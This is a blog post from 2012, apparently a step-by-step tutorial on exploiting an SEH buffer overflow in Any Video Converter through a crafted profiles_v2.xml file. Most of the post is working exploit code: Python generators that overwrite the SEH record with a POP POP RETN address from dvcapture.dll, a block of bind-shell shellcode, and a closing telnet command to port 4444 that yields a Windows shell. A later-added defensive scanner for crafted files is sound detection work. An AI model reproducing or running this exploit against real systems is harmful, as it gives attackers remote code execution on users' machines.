Friday 5 October 2012

Buffer Overflow Any Video Converter

Posted at 21:18
In this section we will learn how to exploit Any Video Converter. First, we must find the part of the application that can be attacked with a buffer overflow. In this case, I found that profiles_v2.xml is vulnerable, so we need to create a fuzzer that writes a file shaped like profiles_v2.xml.


#!C:\Python27\python.exe
filename = "profiles_v2.xml"
buffer = "\x41" * 1000 # 1000 'A' bytes as the category name, enough to trigger the overflow
header = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?>\n"
header += "<root>\n"
header += "<categories>\n"
header += "<category name=\""+buffer+"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"Lorem ipsum dolor\"/>\n"
header += "</categories>\n"
header += "<groups></groups>\n"
header += "<profiles></profiles>\n"
header += "</root>\n"

sploit = header
fopen = open(filename,'w') # write file
fopen.write(sploit) # insert buffer into file
fopen.close() # close file
Run the fuzzer; it generates a file named "profiles_v2.xml". Copy this file into the root directory of Any Video Converter.
Open Any Video Converter in OllyDbg and press F9.
Look at the stack at ESP: it contains "A" characters. To pass the exception on to the SEH chain, click View->SEH chain and press Shift+F9. EIP will be overwritten.

To find exactly which bytes overwrite EIP, I will use the pattern tools from Metasploit.
./pattern_create.rb 1000

Edit the fuzzer to use the generated pattern as the buffer.
#!C:\Python27\python.exe
filename = "profiles_v2.xml"
buffer = "\xAF\xDE\x20\x3E............." # the full 1000-byte output of pattern_create.rb goes here (truncated on the page)
header = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?>\n"
header += "<root>\n"
header += "<categories>\n"
header += "<category name=\""+buffer+"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"Lorem ipsum dolor\"/>\n"
header += "</categories>\n"
header += "<groups></groups>\n"
header += "<profiles></profiles>\n"
header += "</root>\n"
sploit = header
fopen = open(filename,'w') # write file
fopen.write(sploit) # insert buffer into file
fopen.close() # close file
Run the fuzzer again, copy the result into the Any Video Converter directory, load the application in OllyDbg and press F9.
Pass the exception on: click View->SEH chain and press Shift+F9. Note the value of EIP.
To find the offset of the bytes that overwrote EIP, run pattern_offset:
./pattern_offset.rb the_value_of_eip
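The pattern_create/pattern_offset steps above, re-implemented as a small Python 3 crash-triage helper (an added example, not code from the original post or from Metasploit): it generates the same Aa0Aa1... cyclic pattern and maps an EIP value, as OllyDbg displays it, back to the byte offset in the pattern, returning None when the value did not come from the pattern (for example when EIP still shows 41414141).

```python
import string
from itertools import product
from typing import Optional


def pattern_create(length: int) -> str:
    """Cyclic pattern in the Metasploit layout: 'Aa0Aa1Aa2...' (upper, lower, digit).
    Every 4-byte window is unique for up to 20280 bytes, which covers the 1000 used here."""
    out = []
    for upper, lower, digit in product(string.ascii_uppercase, string.ascii_lowercase, string.digits):
        out.append(upper + lower + digit)
        if len(out) * 3 >= length:
            break
    return "".join(out)[:length]


def pattern_offset(pattern: str, eip_hex: str) -> Optional[int]:
    """Map a crash EIP (as the debugger shows it, e.g. '6C41396B' or '0x6c41396b')
    back to the byte offset in the pattern. The register holds the four bytes
    little-endian, so they are reversed before searching. None = not from the pattern."""
    value = int(eip_hex, 16)
    needle = value.to_bytes(4, "little").decode("ascii", errors="replace")
    idx = pattern.find(needle)
    return idx if idx >= 0 else None


if __name__ == "__main__":
    pat = pattern_create(1000)
    print(pat[:24])                         # Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7
    print(pattern_offset(pat, "6C41396B"))  # 328: the bytes 'k9Al' sit at offset 328
    print(pattern_offset(pat, "41414141"))  # None: EIP still holds plain 'A' filler
```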
Now we must find a module loaded by the application that was not compiled with SafeSEH.
I chose dvcapture.dll; to verify that it was not compiled with SafeSEH:
./msfpescan -i dvcapture.dll | grep DllCharacteristics
If this returns 0x00000000, the module was not compiled with SafeSEH.
./msfpescan -i dvcapture.dll | grep SEHandler
If this returns nothing, the module has no SEH handler table, so it was not compiled with SafeSEH.

In OllyDbg, click View->Executable modules, select dvcapture.dll, then right click->Search for->Sequence of commands and search for POP r32 / POP r32 / RETN.
Note the address of the first POP.
Go back to the fuzzer and edit it:
#!C:\Python27\python.exe
filename = "profiles_v2.xml"
buffer = "\x90" * 328 # padding before the SEH record
buffer += "\xeb\x06\x90\x90" # next SEH pointer: JMP SHORT +6, jumps over the handler address
buffer += "\x33\xE6\x01\x10" # SEH handler: POP POP RETN address in dvcapture.dll (0x1001E633, little-endian)
buffer += "\x90" * (1000-len(buffer))
header = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?>\n"
header += "<root>\n"
header += "<categories>\n"
header += "<category name=\""+buffer+"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"Lorem ipsum dolor\"/>\n"
header += "</categories>\n"
header += "<groups></groups>\n"
header += "<profiles></profiles>\n"
header += "</root>\n"

sploit = header
fopen = open(filename,'w') # write file
fopen.write(sploit) # insert buffer into file
fopen.close() # close file
Run the fuzzer, copy the result into the Any Video Converter directory and load the application in OllyDbg.
Click View->SEH chain and press Shift+F9, then look at the EIP value: does it point into dvcapture.dll? If yes, the fuzzer worked.

Now put the payload into the fuzzer.
Note that the bad characters are 00, 0a, 0d, 22, 25, 26 and 3e (NUL, LF, CR and the XML-significant characters ", %, & and >).
#!C:\Python27\python.exe
filename = "profiles_v2.xml"
buffer = "\x90" * 328 # padding before the SEH record
buffer += "\xeb\x06\x90\x90" # next SEH pointer: JMP SHORT +6 over the handler address
buffer += "\x33\xE6\x01\x10" # SEH handler: POP POP RETN in dvcapture.dll
# payload: bind shell (must not contain the bad characters listed above)
buffer += ("\x2b\xc9\xb1\x51\xdb\xd3\xd9\x74\x24\xf4\xbf\x05\xa5\x63\x91\x58"
"\x31\x78\x13\x83\xc0\x04\x03\x7d\xaa\x81\x64\x81\xde\xae\xca\x91"
"\xe6\xce\x2a\x9e\x79\xba\xb9\x44\x5e\x37\x04\xb8\x15\x3b\x82\xb8"
"\x28\x2b\x07\x77\x33\x38\x47\xa7\x42\xd5\x31\x2c\x70\xa2\xc3\xdc"
"\x48\x74\x5a\x8c\x2f\xb4\x29\xcb\xee\xff\xdf\xd2\x32\x14\x2b\xef"
"\xe6\xcf\xfc\x7a\xe2\x9b\xa2\xa0\xed\x70\x3a\x23\xe1\xcd\x48\x6c"
"\xe6\xd0\xa5\x91\x3a\x58\xb0\xf9\x66\x42\xa2\xc2\x56\xa1\x40\x4f"
"\xdb\x65\x02\x0f\xd0\x0e\x64\x93\x45\x9b\xc5\xa3\xcb\xf4\x4b\xfd"
"\xfd\xe8\x04\xfe\xd4\x97\xf7\x66\xb1\x64\xca\x0e\x36\xf8\x18\x91"
"\xec\x01\x8c\x45\xc6\x13\xd1\xae\x88\x14\xfc\x8f\xa1\x0e\x67\xae"
"\x5f\xd8\x6a\xe5\xf5\xdb\x95\xd5\x62\x05\x60\x20\xdf\xe2\x8c\x1c"
"\x73\x5e\x20\xf3\x27\x23\x95\xb0\x94\x5c\xc9\x50\x73\xb2\xb6\xfa"
"\xd0\x3d\xa7\x97\xbf\x99\x32\xe7\xf8\xb5\xbd\xd1\x6d\x2a\x13\x88"
"\x8e\x9a\xfb\x96\xdc\x35\x15\x81\xe1\x9c\xb6\x78\xe1\xf1\x51\x67"
"\x54\x74\xe8\x30\x98\xae\xbb\xea\x32\x1a\xc3\xc2\x28\xcc\xdc\x9b"
"\x88\x74\x74\xa4\xc3\xd2\x85\x8a\x8a\xb6\x1d\x4c\x3b\x24\xb3\x19"
"\x5e\xc0\x1b\x40\x88\xd9\x15\x95\xa0\xa5\xac\xbb\x04\xe6\x5c\x91"
"\x99\xa4\x8f\x1b\x27\x05\x43\x6e\xd2\x6d\xc8\xdb\x88\xe6\x7c\xe5"
"\x7c\xe0\x7f\x6c\xc7\xf2\x56\xd5\x90\x5e\x06\xb8\x4f\x35\xa9\x6b"
"\x21\x9c\xf8\x74\x11\x76\x56\x53\x97\x49\xfb\x9c\x4e\x3f\x03\x9d"
"\x58\x3f\x2b\xea\xf0\x43\x4f\x28\x9a\x44\x86\xe2\x9c\x6b\x4f\x7c"
"\xbb\x6e\xe3\xd3\xc4\xb9\xfb\x03")
buffer += "\x90" * (1000-len(buffer))
header = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?>\n"
header += "<root>\n"
header += "<categories>\n"
header += "<category name=\""+buffer+"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"Lorem ipsum dolor\"/>\n"
header += "</categories>\n"
header += "<groups></groups>\n"
header += "<profiles></profiles>\n"
header += "</root>\n"

sploit = header
fopen = open(filename,'w') # write file
fopen.write(sploit) # insert buffer into file
fopen.close() # close file
Run the fuzzer, copy the file into the Any Video Converter directory, and run the application.
Back on BackTrack, open a terminal and run telnet:
telnet 192.168.56.101 4444
Okay, you have the Windows shell.
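As an added example from the defender's side (not part of the original post), a Python 3 check that flags a crafted profiles_v2.xml like the ones generated above before a vulnerable application parses it: it looks for oversized attribute values, bytes outside printable ASCII (the bad-character list above shows the parser already treats some bytes specially), and NOP or filler runs. The 128-byte name limit and the sample files are assumptions constructed here.

```python
import re
from typing import List

# Assumptions (not from the original post): a legitimate category name is short
# printable text, so longer values or non-printable bytes are treated as suspicious.
MAX_NAME = 128
ATTR_RE = re.compile(rb'(\w+)="([^"]*)"')            # attribute="value" pairs, on raw bytes
SLED_RE = re.compile(rb'(?:\x90{16,}|A{64,})')        # NOP sled or long 'A' filler run


def scan_profiles_xml(data: bytes) -> List[str]:
    """Return findings for one profiles_v2.xml; an empty list means nothing suspicious."""
    findings = []
    for m in ATTR_RE.finditer(data):
        attr, value = m.group(1).decode("ascii"), m.group(2)
        if len(value) > MAX_NAME:
            findings.append(f"{attr}: oversized value ({len(value)} bytes)")
        bad = sum(1 for b in value if b < 0x20 or b > 0x7e)
        if bad:
            findings.append(f"{attr}: {bad} non-printable bytes")
        if SLED_RE.search(value):
            findings.append(f"{attr}: NOP sled or filler run")
    return findings


def build_profile(name: bytes) -> bytes:
    """Build a profiles_v2.xml with the layout the post targets (constructed sample)."""
    return (b'<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>\n<root>\n<categories>\n'
            b'<category name="' + name + b'" id="0" icon="cat_all.bmp" desc="Lorem ipsum dolor"/>\n'
            b'</categories>\n<groups></groups>\n<profiles></profiles>\n</root>\n')


BENIGN = build_profile(b"All Profiles")   # what a real category name looks like (constructed)
CRASH = build_profile(b"\x41" * 1000)     # the first fuzzer's output: 1000 'A' bytes
SLED = build_profile(b"\x90" * 1000)      # a pure NOP sled in the name attribute

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("crash", CRASH), ("sled", SLED)):
        print(label, scan_profiles_xml(sample))
```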

©2012 SECURITY